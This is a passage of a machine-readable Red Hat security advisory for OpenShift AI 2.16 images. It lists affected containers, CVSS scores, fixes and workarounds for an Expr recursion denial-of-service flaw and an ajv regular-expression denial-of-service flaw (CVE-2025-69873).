"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "workaround",
"details": "To mitigate this issue, applications using the `Expr` library should ensure that evaluation environments do not contain cyclic references. Additionally, externally supplied data structures must be validated or sanitized before being passed to `Expr` for evaluation. As a last-resort defensive measure, expression evaluation can be wrapped with panic recovery to prevent a full process crash.",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/expr-lang/expr: Expr: Denial of Service via uncontrolled recursion in expression evaluation"
},
{
"cve": "CVE-2025-69873",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-11T19:01:32.953264+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439070"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ajv: ReDoS via $data reference",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, the $data option must be enabled and the attacker needs to be able to send a payload with a specially crafted regular expression to the application processing the input. A 31-character payload causes approximately 44 seconds of execution, with each additional character doubling the execution time. Therefore, even a small payload can cause an application to become unresponsive and eventually result in a denial of service. Due to this reason, this flaw has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "RHBZ#2439070",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439070"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-69873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69873"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md",
"url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md"
}
],
"release_date": "2026-02-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable the $data feature if your application does not require it. If $data must be used, implement strict validation of the input fields that are referenced by the pattern keyword to ensure they contain only expected and safe characters.",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
